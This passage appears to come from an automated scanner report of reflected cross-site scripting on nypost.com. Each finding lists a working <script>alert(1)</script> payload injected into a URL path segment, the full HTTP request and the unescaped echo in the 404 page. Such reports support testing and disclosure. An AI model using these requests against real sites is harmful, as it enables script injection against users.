Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 747
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:27 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig9270c<script>alert(1)</script>7f4bc085917/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css</p>
...[SNIP]...

1.204. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 65cda<script>alert(1)</script>376ac24913 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal65cda<script>alert(1)</script>376ac24913/nypost/blocks/classifieds_verticals/classifieds_verticals.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 746
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:32 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal65cda<script>alert(1)</script>376ac24913/nypost/blocks/classifieds_verticals/classifieds_verticals.css</p>
...[SNIP]...

1.205. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8c55<script>alert(1)</script>c4d72438687 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nyposta8c55<script>alert(1)</script>c4d72438687/blocks/classifieds_verticals/classifieds_verticals.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 747
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:34 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nyposta8c55<script>alert(1)</script>c4d72438687/blocks/classifieds_verticals/classifieds_verticals.css</p>
...[SNIP]...

1.206. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload eb930<script>alert(1)</script>a951160820c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blockseb930<script>alert(1)</script>a951160820c/classifieds_verticals/classifieds_verticals.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 747
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:39 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blockseb930<script>alert(1)</script>a951160820c/classifieds_verticals/classifieds_verticals.css</p>
...[SNIP]...

1.207. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9813d<script>alert(1)</script>624dd600ebd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals9813d<script>alert(1)</script>624dd600ebd/classifieds_verticals.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 747
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:41 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals9813d<script>alert(1)</script>624dd600ebd/classifieds_verticals.css</p>
...[SNIP]...

1.208. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 11eb5<script>alert(1)</script>240343d24bd was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css11eb5<script>alert(1)</script>240343d24bd HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 747
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:42 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css11eb5<script>alert(1)</script>240343d24bd</p>
...[SNIP]...

1.209. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9004e<script>alert(1)</script>dc2a72fb414 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig9004e<script>alert(1)</script>dc2a72fb414/WebPortal/nypost/blocks/fat_header/fat_header.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:00 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig9004e<script>alert(1)</script>dc2a72fb414/WebPortal/nypost/blocks/fat_header/fat_header.css</p>
...[SNIP]...

1.210. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1e704<script>alert(1)</script>cfdf90f07f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal1e704<script>alert(1)</script>cfdf90f07f2/nypost/blocks/fat_header/fat_header.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:02 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal1e704<script>alert(1)</script>cfdf90f07f2/nypost/blocks/fat_header/fat_header.css</p>
...[SNIP]...

1.211. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 38a9c<script>alert(1)</script>e29f874c4ff was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost38a9c<script>alert(1)</script>e29f874c4ff/blocks/fat_header/fat_header.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost38a9c<script>alert(1)</script>e29f874c4ff/blocks/fat_header/fat_header.css</p>
...[SNIP]...

1.212. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload de60c<script>alert(1)</script>24281a7b28a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocksde60c<script>alert(1)</script>24281a7b28a/fat_header/fat_header.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocksde60c<script>alert(1)</script>24281a7b28a/fat_header/fat_header.css</p>
...[SNIP]...

1.213. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f2df3<script>alert(1)</script>ac3fe82c465 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/fat_headerf2df3<script>alert(1)</script>ac3fe82c465/fat_header.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:10 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/fat_headerf2df3<script>alert(1)</script>ac3fe82c465/fat_header.css</p>
...[SNIP]...

1.214. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload f1102<script>alert(1)</script>3c9a06992d2 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.cssf1102<script>alert(1)</script>3c9a06992d2 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:11 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.cssf1102<script>alert(1)</script>3c9a06992d2</p>
...[SNIP]...

1.215. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc016<script>alert(1)</script>2745160a2e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigcc016<script>alert(1)</script>2745160a2e2/WebPortal/nypost/blocks/footer/footer.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigcc016<script>alert(1)</script>2745160a2e2/WebPortal/nypost/blocks/footer/footer.css</p>
...[SNIP]...

1.216. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e041d<script>alert(1)</script>ef5daaa7b34 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortale041d<script>alert(1)</script>ef5daaa7b34/nypost/blocks/footer/footer.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortale041d<script>alert(1)</script>ef5daaa7b34/nypost/blocks/footer/footer.css</p>
...[SNIP]...

1.217. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b723f<script>alert(1)</script>624ac6e556 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostb723f<script>alert(1)</script>624ac6e556/blocks/footer/footer.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:09 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostb723f<script>alert(1)</script>624ac6e556/blocks/footer/footer.css</p>
...[SNIP]...

1.218. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 41d96<script>alert(1)</script>dceb556a181 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks41d96<script>alert(1)</script>dceb556a181/footer/footer.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks41d96<script>alert(1)</script>dceb556a181/footer/footer.css</p>
...[SNIP]...

1.219. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 67450<script>alert(1)</script>50498f63a55 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/footer67450<script>alert(1)</script>50498f63a55/footer.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:19 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/footer67450<script>alert(1)</script>50498f63a55/footer.css</p>
...[SNIP]...

1.220. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b2b3c<script>alert(1)</script>890670991d1 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.cssb2b3c<script>alert(1)</script>890670991d1 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.cssb2b3c<script>alert(1)</script>890670991d1</p>
...[SNIP]...

1.221. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6cc6e<script>alert(1)</script>ae37078603d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig6cc6e<script>alert(1)</script>ae37078603d/WebPortal/nypost/blocks/hat/hat.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
